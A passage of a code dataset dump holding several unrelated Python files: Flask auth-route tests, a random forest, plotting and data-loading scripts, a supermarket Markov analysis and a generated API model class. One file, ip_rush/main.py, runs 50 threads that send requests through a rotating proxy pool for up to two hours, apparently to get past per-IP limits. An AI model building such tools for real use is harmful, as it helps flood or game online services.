protected by auth\ndef is_unprotected(rule):\n return rule.endpoint in UNPROTECTED_ROUTES\n\n\ndef protected_routes(app):\n for rule in app.url_map.iter_rules():\n args = [1] * len(rule.arguments)\n mock_args = dict(zip(rule.arguments, args))\n _n, route = rule.build(mock_args)\n if is_unprotected(rule) or \"/static\" in route:\n continue\n yield rule, route\n\n\ndef test_protected_routes_redirect_to_login(client, app):\n server_name = app.config.get(\"SERVER_NAME\") or \"localhost\"\n for rule, protected_route in protected_routes(app):\n if \"GET\" in rule.methods:\n resp = client.get(protected_route)\n assert resp.status_code == 302\n assert server_name in resp.headers[\"Location\"]\n\n if \"POST\" in rule.methods:\n resp = client.post(protected_route)\n assert resp.status_code == 302\n assert server_name in resp.headers[\"Location\"]\n\n\ndef test_unprotected_routes_set_user_if_logged_in(client, app, user_session):\n user = UserFactory.create()\n\n resp = client.get(url_for(\"atat.about\"))\n assert resp.status_code == 200\n assert user.full_name not in resp.data.decode()\n\n user_session(user)\n resp = client.get(url_for(\"atat.about\"))\n assert resp.status_code == 200\n assert user.full_name in resp.data.decode()\n\n\ndef test_logout(app, client, mock_login, mock_logger):\n user = UserFactory.create()\n # create a real session\n mock_login(user, client)\n resp_success = client.get(url_for(\"users.user\"))\n # verify session is valid\n assert resp_success.status_code == 200\n client.get(url_for(\"atat.logout\"))\n resp_failure = client.get(url_for(\"users.user\"))\n # verify that logging out has cleared the session\n assert resp_failure.status_code == 302\n destination = urlparse(resp_failure.headers[\"Location\"]).path\n assert destination == url_for(\"atat.root\")\n # verify that logout is noted in the logs\n logout_msg = mock_logger.messages[-1]\n assert user.dod_id in logout_msg\n assert \"logged out\" in logout_msg\n\n\ndef test_logging_out_creates_a_flash_message(app, client, mock_login):\n user = UserFactory.create()\n mock_login(user, client)\n logout_response = client.get(url_for(\"atat.logout\"), follow_redirects=True)\n\n assert \"Logged out\" in logout_response.data.decode()\n\n\ndef test_redirected_on_login(client, monkeypatch, mock_login):\n target_route = url_for(\"users.user\")\n user = UserFactory.create()\n # create a mock for the SAML provider\n saml_auth_mock = Mock()\n # mock our the last request ID, which must be serialized to the session\n saml_auth_mock.get_last_request_id.return_value = 5\n monkeypatch.setattr(\n \"atat.routes.saml_helpers.init_saml_auth\", lambda *a: saml_auth_mock\n )\n # GET the login route, which will populate the \"next\" param in the user's session\n response = client.get(url_for(\"atat.login\", next=target_route))\n # login with the POST portion of the fed auth flow; user should be\n # redirected to the location of the original \"next\" param\n response = mock_login(user, client)\n assert response.status_code == 302\n assert target_route in response.headers.get(\"Location\")\n\n\ndef test_last_login_set_when_user_logs_in(client, mock_login):\n last_login = pendulum.now(tz=\"UTC\")\n user = UserFactory.create(last_login=last_login)\n mock_login(user, client)\n assert session[\"last_login\"]\n assert user.last_login > session[\"last_login\"]\n assert isinstance(session[\"last_login\"], datetime)\n\n\n@pytest.mark.parametrize(\n \"url,status_code\", [(\"/\", 200), (\"/this-page-will-never-exist\", 302)]\n)\ndef test_hsts_unprotected(client, url, status_code):\n response = client.get(url, follow_redirects=False)\n assert response.status_code == status_code\n assert (\n response.headers.get(\"Strict-Transport-Security\")\n == \"max-age=31536000; includeSubDomains; always\"\n )\n\n\n@pytest.mark.parametrize(\n \"url,status_code\", [(PROTECTED_URL, 200), (\"/this-page-will-never-exist\", 404)]\n)\ndef test_hsts_protected(client, mock_login, url, status_code):\n user = UserFactory.create()\n mock_login(user, client)\n response = client.get(url, follow_redirects=False)\n assert response.status_code == status_code\n assert (\n response.headers.get(\"Strict-Transport-Security\")\n == \"max-age=31536000; includeSubDomains; always\"\n )\n","sub_path":"tests/routes/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":6678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"302350887","text":"\nimport tree as tree\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as stats\nfrom sklearn.model_selection import train_test_split\n\n\nclass RandomForest:\n ''' Implements the Random Forest For Classification... '''\n\n def __init__(self, ntrees=10, treedepth=5, usebagging=False, baggingfraction=0.6,\n weaklearner=\"Conic\",\n nsplits=10,\n nfeattest=None, posteriorprob=False, scalefeat=True):\n \"\"\"\n Build a random forest classification forest....\n\n Input:\n ---------------\n ntrees: number of trees in random forest\n treedepth: depth of each tree\n usebagging: to use bagging for training multiple trees\n baggingfraction: what fraction of training set to use for building each tree,\n weaklearner: which weaklearner to use at each interal node, e.g. \"Conic, Linear, Axis-Aligned, Axis-Aligned-Random\",\n nsplits: number of splits to test during each feature selection round for finding best IG,\n nfeattest: number of features to test for random Axis-Aligned weaklearner\n posteriorprob: return the posteriorprob class prob\n scalefeat: wheter to scale features or not...\n \"\"\"\n\n self.ntrees = ntrees\n self.treedepth = treedepth\n self.usebagging = usebagging\n self.baggingfraction = baggingfraction\n\n self.weaklearner = weaklearner\n self.nsplits = nsplits\n self.nfeattest = nfeattest\n\n self.posteriorprob = posteriorprob\n\n self.scalefeat = scalefeat\n\n pass\n\n def findScalingParameters(self, X):\n \"\"\"\n find the scaling parameters\n input:\n -----------------\n X= m x d training data matrix...\n \"\"\"\n self.mean = np.mean(X, axis=0)\n self.std = np.std(X, axis=0)\n\n def applyScaling(self, X):\n \"\"\"\n Apply the scaling on the given training parameters\n Input:\n -----------------\n X: m x d training data matrix...\n Returns:\n -----------------\n X: scaled version of X\n \"\"\"\n X = X - self.mean\n X = X / self.std\n return X\n\n def train(self, X, Y, vX=None, vY=None):\n '''\n Trains a RandomForest using the provided training set..\n\n Input:\n ---------\n X: a m x d matrix of training data...\n Y: labels (m x 1) label matrix\n\n vX: a n x d matrix of validation data (will be used to stop growing the RF)...\n vY: labels (n x 1) label matrix\n\n Returns:\n -----------\n\n '''\n\n nexamples, nfeatures = X.shape\n\n self.findScalingParameters(X)\n if self.scalefeat:\n X = self.applyScaling(X)\n\n self.trees = []\n\n\n if vX is not None and vY is not None:\n self.ntrees = self.find_best_parameters(X, Y, vX, vY)\n\n print(\"\\nBuilding Classifier\\n\")\n for ntree in range(self.ntrees):\n print (\"Creating tree # {}\".format(ntree+1))\n self.trees.append(self.train_tree(X, Y))\n print('')\n\n def train_tree(self, X, Y, verbose = True ):\n '''\n Trains A tree based on given arguments\n\n return : the Decision Tree object\n '''\n\n dt = tree.DecisionTree(exthreshold=10, maxdepth=self.treedepth,\n weaklearner=self.weaklearner, nsplits=self.nsplits)\n dt.verbose = verbose\n\n if self.usebagging:\n X_train, _, Y_train, _ = train_test_split(X, Y, train_size=self.baggingfraction)\n dt.train(X_train, Y_train)\n return dt\n \n dt.train(X, Y)\n return dt\n \n def find_best_parameters(self, X, Y, vX, vY):\n '''\n\n Trains RandomForest using the provided training set with trees ranging from\n 10 to 30 return the best ntrees with best accuracy.\n\n Input:\n ---------\n X: a m x d matrix of training data...\n Y: labels (m x 1) label matrix\n\n vX: a n x d matrix of validation data (will be used to stop growing the RF)...\n vY: labels (n x 1) label matrix\n\n Returns:\n -----------\n Optimal Number of Trees\n Optimal Depth\n\n '''\n\n accuracy_list = []\n optimal_parameters = []\n\n for ntrees in range(10,31,2):\n\n print (\"Creating Classifier with {} trees.\".format(ntrees))\n # Training Classifier\n for ntree in range(ntrees):\n self.trees.append(self.train_tree(X, Y, verbose = False))\n\n Yp = self.predict(vX)\n optimal_parameters.append( ntrees )\n acc = self.find_accuracy(vY,Yp)\n print (\"Accuracy of Classifier with {} trees is {}.\".format(ntrees, acc*100))\n accuracy_list.append(acc)\n self.trees.clear()\n\n maxAcc = np.argmax(accuracy_list)\n param = optimal_parameters[maxAcc]\n print(\"Validation Comple. Optimal Parameters: Trees = {} with Accuracy {} \".format(param,accuracy_list[maxAcc]) )\n return param\n\n def find_accuracy(self, Y, Yp):\n plabels = pd.Series(np.squeeze(Yp))\n tlabels = pd.Series(np.squeeze(Y))\n\n acc = np.sum(tlabels == plabels) / len(Y)\n return acc\n\n def predict(self, X):\n \"\"\"\n Test the trained RF on the given set of examples X\n\n\n Input:\n ------\n X: [m x d] a d-dimensional test examples.\n\n Returns:\n -----------\n pclass: the predicted class for the given example, i.e. to which it belongs\n \"\"\"\n z = []\n\n if self.scalefeat:\n X = self.applyScaling(X)\n\n pred = []\n\n for tree in self.trees:\n z.append(tree.predict(X))\n z = np.array(z).T\n\n for row in z:\n pred.append(stats.mode(row)[0])\n return pred\n","sub_path":"randomForest.py","file_name":"randomForest.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"642357755","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\n\n\nif(len(sys.argv) == 3):\n csv_name = sys.argv[1]\n graph_name = sys.argv[2]\n\n df = pd.read_csv(csv_name)\n df1 = df.iloc[:,3:]\n values = []\n for i in range(0,len(df1.columns)):\n values.append(df1.iloc[:,i].sum())\n faults = ['t_1bit','t_1word','t_1col','t_1row','t_1bank','t_nbank','t_nrank','p_1bit','p_1word','p_1col','p_1row','p_1bank','p_nbank','p_nrank']\n y_pos = np.arange(len(faults))\n plt.bar(y_pos,values,align='center')\n plt.xticks(y_pos,faults,rotation='vertical')\n plt.ylabel('Fault number')\n plt.xlabel('Fault Type')\n plt.title(graph_name)\n plt.tight_layout()\n plt.savefig(graph_name + \".png\")\n\nelse:\n print(\"Wrong number of arguments\")\n","sub_path":"scripts/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"534644559","text":"import os\nimport glob\nimport platform as pf\nimport yaml\n# import random\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom scipy.misc import imread\nfrom scipy import ndimage\nfrom skimage.feature import canny\nfrom skimage.color import rgb2gray\nfrom utils import create_mask\nfrom utils import tf_canny\nfrom utils import tf_get_color_domain\n\n\nclass Dataset():\n \"\"\"Construct dataset class.\"\"\"\n\n def __init__(self, config, flist):\n # if pf.system() == 'Windows':\n # train_flist = config['TRAIN_FLIST_WIN']\n # val_flist = config['VAL_FLIST_WIN']\n # test_flist = config['TEST_FLIST_WIN']\n # elif pf.system() == 'Linux':\n # if pf.node() == 'icie-Precision-Tower-7810':\n # train_flist = config['TRAIN_FLIST_LINUX_7810']\n # val_flist = config['VAL_FLIST_LINUX_7810']\n # test_flist = config['TEST_FLIST_LINUX_7810']\n # elif pf.node() == 'icie-Precision-T7610':\n # train_flist = config['TRAIN_FLIST_LINUX_7610']\n # val_flist = config['VAL_FLIST_LINUX_7610']\n # test_flist = config['TEST_FLIST_LINUX_7610']\n\n self.cfg = config\n # self.training = training\n self.flist = self.load_flist(flist)\n self.filenames = tf.placeholder(tf.string, shape=[None])\n self.iterator = None\n\n def __len__(self):\n \"\"\"Get the length of dataset.\"\"\"\n return len(self.flist)\n\n def load_items(self):\n images = self.load_images()\n img_color_domains = self.load_color_domain(images)\n return images, img_color_domains\n\n def input_parse(self, img_path):\n with tf.device('/cpu:0'):\n img_file = tf.read_file(img_path)\n img_decoded = tf.image.decode_png(img_file, channels=3)\n img = tf.cast(img_decoded, tf.float32) # [1024, 1024, 3]\n # img = tf.image.resize_area(img, [self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE']])\n # img = tf.clip_by_value(img, 0., 255.)\n # img = tf.image.resize_image_with_crop_or_pad(img, self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE'])\n # img = img / 127.5 - 1\n return img # [-1, 1]\n\n def load_images(self):\n dataset = tf.data.Dataset.from_tensor_slices(self.filenames)\n dataset = dataset.map(self.input_parse)\n dataset = dataset.shuffle(buffer_size=100)\n dataset = dataset.batch(self.cfg['BATCH_SIZE'], drop_remainder=True)\n dataset = dataset.repeat()\n # train_dataset = train_dataset.batch(self.cfg['BATCH_SIZE'], drop_remainder=True)\n self.iterator = dataset.make_initializable_iterator()\n images = self.iterator.get_next()\n images = tf.image.resize_area(images, [self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE']])\n images = tf.clip_by_value(images, 0., 255.)\n images = images / 127.5 - 1 # [-1, 1]\n\n return images # [N, 256, 256, 3]\n\n def load_color_domain(self, images):\n images = (images + 1) * 127.5 # [0, 255]\n images = tf.cast(images, tf.uint8)\n # shape = images.get_shape().as_list()\n shape = tf.shape(images)\n\n blur_factor1 = self.cfg['BLUR_FACTOR1']\n blur_factor2 = self.cfg['BLUR_FACTOR2']\n k = self.cfg['K']\n\n img_color_domains = tf.map_fn(fn=lambda im: tf_get_color_domain(im, blur_factor1, blur_factor2, k),\n elems=images,\n dtype=tf.float32)\n\n img_color_domains = tf.reshape(img_color_domains, shape)\n return img_color_domains # [N, 256, 256, 3]\n\n def load_flist(self, flist):\n if isinstance(flist, list):\n return flist\n\n # flist: image file path, image directory path, text file flist path\n if isinstance(flist, str):\n if os.path.isdir(flist):\n flist = list(glob.glob(flist + '/*.jpg')) + list(glob.glob(flist + '/*.png')) + \\\n list(glob.glob(flist + '/*.JPG'))\n flist.sort()\n return flist\n\n if os.path.isfile(flist):\n # return np.genfromtxt(flist, dtype=np.str, encoding='utf-8')\n try:\n print('is a file')\n return np.genfromtxt(flist, dtype=np.str, encoding='utf-8')\n except:\n return [flist]\n\n return []\n\n\nclass MaskDataset():\n \"\"\"Construct mask dataset class.\"\"\"\n\n def __init__(self, config, mask_flist):\n # if pf.system() == 'Windows':\n # mask_flist = config['MASK_FLIST_WIN']\n # elif pf.system() == 'Linux':\n # if pf.node() == 'icie-Precision-Tower-7810':\n # mask_flist = config['MASK_FLIST_LINUX_7810']\n # elif pf.node() == 'icie-Precision-T7610':\n # mask_flist = config['MASK_FLIST_LINUX_7610']\n\n self.cfg = config\n self.mask_iterator = None\n self.mask_type = config['MASK']\n self.mask_flist = mask_flist\n\n def load_items(self):\n masks = self.load_masks()\n return masks\n\n def load_masks(self):\n\n # random block + half\n if self.mask_type == 1:\n masks = create_mask(self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE'],\n self.cfg['INPUT_SIZE'] // 2, self.cfg['INPUT_SIZE'] // 2)\n\n return masks # [1, 256, 256, 1]\n\n # external mask\n if self.mask_type == 2:\n mask_path = tf.constant(self.load_flist(self.mask_flist))\n mask_dataset = tf.data.Dataset.from_tensor_slices(mask_path)\n mask_dataset = mask_dataset.map(self.external_mask_parse)\n mask_dataset = mask_dataset.shuffle(buffer_size=50)\n mask_dataset = mask_dataset.batch(self.cfg['BATCH_SIZE'], drop_remainder=True)\n mask_dataset = mask_dataset.repeat()\n self.mask_iterator = mask_dataset.make_initializable_iterator()\n masks = self.mask_iterator.get_next()\n\n return masks # [N, 256, 256, 1]\n\n def external_mask_parse(self, img_path):\n with tf.device('/cpu:0'):\n img_file = tf.read_file(img_path)\n img_decoded = tf.image.decode_png(img_file) # [512, 512]\n img = tf.reshape(img_decoded, [1, 512, 512, 1])\n img = tf.image.resize_area(img, [self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE']])\n img = tf.reshape(img, [self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE'], 1])\n img = tf.cast(tf.greater(img, 3), dtype=tf.float32)\n img = tf.image.rot90(img, tf.random_uniform([], 0, 4, tf.int32))\n img = tf.image.random_flip_left_right(img)\n # img = tf.reshape(img, [self.cfg['INPUT_SIZE'], self.cfg['INPUT_SIZE'], 1])\n\n # 1 for the missing regions, 0 for background\n img = 1 - img\n\n return img # [256, 256, 1]\n\n def load_flist(self, flist):\n if isinstance(flist, list):\n return flist\n\n # flist: image file path, image directory path, text file flist path\n if isinstance(flist, str):\n if os.path.isdir(flist):\n flist = list(glob.glob(flist + '/*.jpg')) + list(glob.glob(flist + '/*.png')) + \\\n list(glob.glob(flist + '/*.JPG'))\n flist.sort()\n return flist\n\n if os.path.isfile(flist):\n # return np.genfromtxt(flist, dtype=np.str, encoding='utf-8')\n try:\n print('is a file')\n return np.genfromtxt(flist, dtype=np.str, encoding='utf-8')\n except:\n return [flist]\n\n return []\n\n\nif __name__ == '__main__':\n with open('config.yaml', 'r') as f:\n cfg = yaml.load(f)\n\n if pf.system() == 'Windows':\n train_flist = cfg['TRAIN_FLIST_WIN']\n val_flist = cfg['VAL_FLIST_WIN']\n test_flist = cfg['TEST_FLIST_WIN']\n mask_flist = cfg['MASK_FLIST_WIN']\n elif pf.system() == 'Linux':\n if pf.node() == 'icie-Precision-Tower-7810':\n train_flist = cfg['TRAIN_FLIST_LINUX_7810']\n val_flist = cfg['VAL_FLIST_LINUX_7810']\n test_flist = cfg['TEST_FLIST_LINUX_7810']\n mask_flist = cfg['MASK_FLIST_LINUX_7810']\n elif pf.node() == 'icie-Precision-T7610':\n train_flist = cfg['TRAIN_FLIST_LINUX_7610']\n val_flist = cfg['VAL_FLIST_LINUX_7610']\n test_flist = cfg['TEST_FLIST_LINUX_7610']\n mask_flist = cfg['MASK_FLIST_LINUX_7610']\n\n dataset = Dataset(cfg, val_flist)\n images, img_color_domains = dataset.load_items()\n iterator = dataset.iterator\n\n mask_dataset = MaskDataset(cfg, mask_flist)\n img_masks = mask_dataset.load_items()\n mask_iterator = mask_dataset.mask_iterator\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n iterators = [iterator.initializer, mask_iterator.initializer] if cfg['MASK'] == 2 else iterator.initializer\n\n feed_dict = {dataset.filenames: dataset.flist}\n\n sess.run(iterators, feed_dict=feed_dict)\n\n tmp0, tmp1, tmp2 = sess.run([images, img_masks, img_color_domains])\n\n tmp0 = (tmp0 + 1) / 2.\n print(tmp0[0].shape)\n # print(tmp2[1, :, :, 0])\n\n plt.figure(figsize=(8, 3))\n\n plt.subplot(131)\n plt.imshow(tmp0[0])\n plt.axis('off')\n plt.title('rgb', fontsize=20)\n\n # plt.subplot(152)\n # plt.imshow(tmp1[0, :, :, 0], cmap=plt.cm.gray)\n # plt.axis('off')\n # plt.title('gray', fontsize=20)\n\n # plt.subplot(153)\n # plt.imshow(tmp2[0, :, :, 0], cmap=plt.cm.gray)\n # plt.axis('off')\n # plt.title('edge', fontsize=20)\n\n plt.subplot(132)\n plt.imshow(tmp1[0, :, :, 0], cmap=plt.cm.gray)\n plt.axis('off')\n plt.title('mask', fontsize=20)\n\n plt.subplot(133)\n plt.imshow(tmp2[0])\n plt.axis('off')\n plt.title('color_domain', fontsize=20)\n\n plt.show()\n\n # flist = dataset.load_flist(cfg['FLIST_WIN'])\n # img = imread(flist[0])\n # img_gray = rgb2gray(img)\n # print(img[:, :, 0])\n # print(img_gray)\n # img_edge = canny(img_gray, sigma=2)\n\n # plt.figure(figsize=(8, 3))\n\n # plt.subplot(131)\n # plt.imshow(img)\n # plt.axis('off')\n # plt.title('rgb', fontsize=20)\n\n # plt.subplot(132)\n # plt.imshow(img_gray, cmap=plt.cm.gray)\n # plt.axis('off')\n # plt.title('gray', fontsize=20)\n\n # plt.subplot(133)\n # plt.imshow(img_edge, cmap=plt.cm.gray)\n # plt.axis('off')\n # plt.title('edge', fontsize=20)\n\n # plt.subplots_adjust(wspace=0.02, hspace=0.02, top=0.9, bottom=0.02, left=0.02, right=0.98)\n\n # plt.show()\n","sub_path":"Inpainting/PIC-EC/color_domain/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":10828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"191596180","text":"import json\nimport cPickle as pickle\nimport numpy as np\n\nfrom bubbly.model import Model, ModelGroup\nfrom bubbly.extractors import MultiViewExtractor, ManyManyExtractors\nfrom bubbly.dr1 import WideLocationGenerator,LocationGenerator\nfrom bubbly.wiserf import WiseRF\n#from sklearn.ensemble import RandomForestClassifier\n\ndef add_traningset_1(data,lon):\n for ctt_l in range(10):\n for ctt_b in range(4):\n data['pos'].append([lon, lon%360-0.95+ctt_l*0.1, (ctt_b-1)*0.1, 0.046])\n return data\n \ndef add_traningset_2(data,lon):\n for ctt_l in range(10):\n for ctt_b in range(4):\n data['pos'].append([lon, lon%360-0.95+ctt_l*0.1, (ctt_b-1)*0.1, 0.038])\n return data\n \ndef add_traningset_neg(data,lon):\n for ctt_l in range(20):\n for ctt_b in range(8):\n data['neg'].append([lon, lon%360-0.95+ctt_l*0.1, (ctt_b-3.5)*0.1, 0.046]) \n return data\n \n \ndef make_model(mod3):\n params = {'max_features': 'auto',\n 'n_jobs': 2,\n 'min_samples_split': 4,\n# 'criterion': 'infogain',\n 'criterion': 'gini', ### entropy\n# 'criterion': 'entropy', ### \n 'n_estimators': 800}\n ex = MultiViewExtractor(ManyManyExtractors())\n loc = WideLocationGenerator(mod3)\n# clf = RandomForestClassifier(**params)\n clf = WiseRF(**params)\n return Model(ex, loc, clf)\n\n\ndef train_model(model, mod3):\n# data = json.load(open('../models/training_data_%i.json' % mod3))\n data = json.load(open('../models/training_dataxdno_%i.json' % mod3))\n# data = json.load(open('../models/training_dataxd_%i.json' % mod3))\n\n\n# if mod3==0:\n# for lon_all in np.array([71,82,74,76])+360:\n# data=add_traningset_1(data,np.int(lon_all))\n# for lon_all in np.array([73,85,77])+360:\n# data=add_traningset_2(data,np.int(lon_all))\n# data=add_traningset_neg(data,82)\n# if mod3==1:\n# for lon_all in np.array([71,72,74,86])+360:\n# data=add_traningset_1(data,np.int(lon_all))\n# for lon_all in np.array([83,75,77])+360:\n# data=add_traningset_2(data,np.int(lon_all)) \n# data=add_traningset_neg(data,83)\n# if mod3==2:\n# for lon_all in np.array([81,72,84,76])+360:\n# data=add_traningset_1(data,np.int(lon_all))\n# for lon_all in np.array([73,75,87])+360:\n# data=add_traningset_2(data,np.int(lon_all)) \n# data=add_traningset_neg(data,82)\n \n if mod3==0:\n for lon_all in np.array([71,82,74,76,121,112,124,116])+360:\n# for lon_all in np.array([121,112,124,116])+360:\n data=add_traningset_1(data,np.int(lon_all))\n for lon_all in np.array([73,85,77,113,115,127])+360:\n# for lon_all in np.array([113,115,127])+360:\n data=add_traningset_2(data,np.int(lon_all))\n data=add_traningset_neg(data,82)\n if mod3==1:\n for lon_all in np.array([71,72,74,86,111,122,114,116])+360:\n# for lon_all in np.array([111,122,114,116])+360:\n data=add_traningset_1(data,np.int(lon_all))\n for lon_all in np.array([83,75,77,113,125,117])+360:\n# for lon_all in np.array([113,125,117])+360:\n data=add_traningset_2(data,np.int(lon_all)) \n data=add_traningset_neg(data,83)\n if mod3==2:\n for lon_all in np.array([81,72,84,76,111,112,114,126])+360:\n# for lon_all in np.array([111,112,114,126])+360:\n data=add_traningset_1(data,np.int(lon_all))\n for lon_all in np.array([73,75,87,123,115,117])+360:\n# for lon_all in np.array([123,115,117])+360:\n data=add_traningset_2(data,np.int(lon_all)) \n data=add_traningset_neg(data,82)\n \n \n model.fit(data['pos'], data['neg'])\n return model\n\n#\"\"\"\ndef main():\n\n models = [train_model(make_model(i), i) for i in [0, 1, 2]]\n# models = [train_model(make_model(i), i) for i in [0]]\n mg = ModelGroup(*models)\n# mg.save('../models/full_classifier_retrain_xd_all_0417_noise.dat')\n# mg.save('../models/full_classifier_retrain_xd_all_entropy_0430.dat')\n# mg.save('../models/full_classifier_retrain_xd_all_gini_0528.dat')\n# mg.save('../models/full_classifier_xd_entropy_0528.dat')\n# mg.save('../models/full_classifier_xd_reduceMWP_simulation_1025.dat')\n# mg.save('../models/full_classifier_xd_only_simulation_1029.dat')\n# mg.save('../models/full_classifier_xd_retrain_noise_1030.dat')\n mg.save('../models/full_classifier_xd_only_sim_non_noi_1102.dat')\n# mg.save('../models/full_classifier_retrain_xd_all_gini_0528.dat')\n# mg.save('../models/full_classifier_xd_all_entropy_0430.dat')\n# mg.save('../models/full_classifier_xd_all_0417.dat')\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/build_full_classifier.py","file_name":"build_full_classifier.py","file_ext":"py","file_size_in_byte":4808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"125906699","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\nProject Markov - \n@author: boti\n\"\"\"\n\n# Import pandas etc\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n\n\n\n\ndef plotsections(df,dayofweek):\n totalcustomers = df['customer_no'].nunique()\n print(totalcustomers)\n print (f'Total number of customers on {dayofweek} : {str(totalcustomers)}')\n print (f'Total number of customers at each location on {dayofweek} :')\n print(df.groupby('location')['customer_no'].nunique())\n df[df['location']=='spices'].resample('1h')['customer_no'].nunique().plot()\n df[df['location']=='fruit'].resample('1h')['customer_no'].nunique().plot()\n df[df['location']=='drinks'].resample('1h')['customer_no'].nunique().plot()\n df[df['location']=='dairy'].resample('1h')['customer_no'].nunique().plot()\n filename = 'plots/sections-' + dayofweek + '.jpg'\n plt.savefig(filename)\n plt.cla()\n\n df[df['location']=='checkout'].resample('1h')['customer_no'].nunique().plot()\n filename = 'plots/checkout-' + dayofweek + '.jpg'\n plt.savefig(filename)\n plt.cla()\n\n finalcheckoutcustomers = totalcustomers - df[df['location']=='checkout']['customer_no'].count()\n print(f'An additional {finalcheckoutcustomers} cutomers check out at 22:00 on {dayofweek}.')\n\n \ndef statediagram(df):\n totalcustomers = df['customer_no'].nunique()\n states = pd.DataFrame(columns=['from','to'])\n for i in range (totalcustomers):\n route = df[df['customer_no']==i + 1]['location'].values\n if route[len(route)-1] != 'checkout':\n route = np.append(route, 'checkout')\n for j in range(len(route)-1):\n states.loc[len(states)] = route[j:j+2]\n return states\n\n\n\n#os.chdir('/home/boti/Spiced/git-repos/stochastic-sage-student-code/project_08/')\n\nmonday = pd.read_csv('./monday.csv',sep=';',index_col='timestamp', parse_dates=True)\ntuesday = pd.read_csv('./tuesday.csv',sep=';',index_col='timestamp', parse_dates=True)\nwednesday = pd.read_csv('./wednesday.csv',sep=';',index_col='timestamp', parse_dates=True)\nthursday = pd.read_csv('./thursday.csv',sep=';',index_col='timestamp', parse_dates=True)\nfriday = pd.read_csv('./friday.csv',sep=';',index_col='timestamp', parse_dates=True)\nplotsections(monday,'Monday')\nplotsections(tuesday,'Tuesday')\nplotsections(wednesday,'Wednesday')\nplotsections(thursday,'Thursday')\nplotsections(friday,'Friday')\n\nmonstates = statediagram(monday)\nprint(monstates.groupby(['from'])['to'].value_counts().unstack())\nprint(pd.crosstab(monstates['from'], monstates['to'],normalize=0))","sub_path":"markov-data-boti.py","file_name":"markov-data-boti.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"114856952","text":"import http.client\r\nimport os\r\nimport socket\r\nimport sys\r\nimport threading\r\nimport time\r\nimport traceback\r\n\r\nfrom final_proxy_generator import FinalProxyGenerator\r\nfrom final_rusher import FinalRusher\r\n\r\nclass RushThread(threading.Thread):\r\n def __init__(self, proxy_generator, rusher):\r\n super().__init__()\r\n self.daemon = False\r\n self._proxy_generator = proxy_generator\r\n self._rusher = rusher\r\n\r\n def run(self):\r\n end_time = time.time() + 7200 # run for at most 1 hour\r\n while time.time() < end_time:\r\n proxy = self._proxy_generator.NextProxy()\r\n self._rusher.Rush(proxy)\r\n\r\ndef main():\r\n NUM_THREADS = 50\r\n HTTP_TIMEOUT = 30\r\n\r\n socket.setdefaulttimeout(HTTP_TIMEOUT) # http time out\r\n proxy_generator = FinalProxyGenerator()\r\n rusher = FinalRusher()\r\n threads = [RushThread(proxy_generator, rusher) for i in range(NUM_THREADS)]\r\n for t in threads:\r\n t.start()\r\n for t in threads:\r\n t.join()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"ip_rush/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"379538247","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# Generated file, DO NOT EDIT\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass CreatePlan(Model):\n \"\"\"CreatePlan.\n\n :param description: Description of the plan\n :type description: str\n :param name: Name of the plan to create.\n :type name: str\n :param properties: Plan properties.\n :type properties: object\n :param type: Type of plan to create.\n :type type: object\n \"\"\"\n\n _attribute_map = {\n 'description': {'key': 'description', 'type': 'str'},\n 'name': {'key': 'name', 'type': 'str'},\n 'properties': {'key': 'properties', 'type': 'object'},\n 'type': {'key': 'type', 'type': 'object'}\n }\n\n def __init__(self, description=None, name=None, properties=None, type=None):\n super(CreatePlan, self).__init__()\n self.description = description\n self.name = name\n self.properties = properties\n self.type = type\n","sub_path":"vsts/vsts/work/v4_1/models/create_plan.py","file_name":"create_plan.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
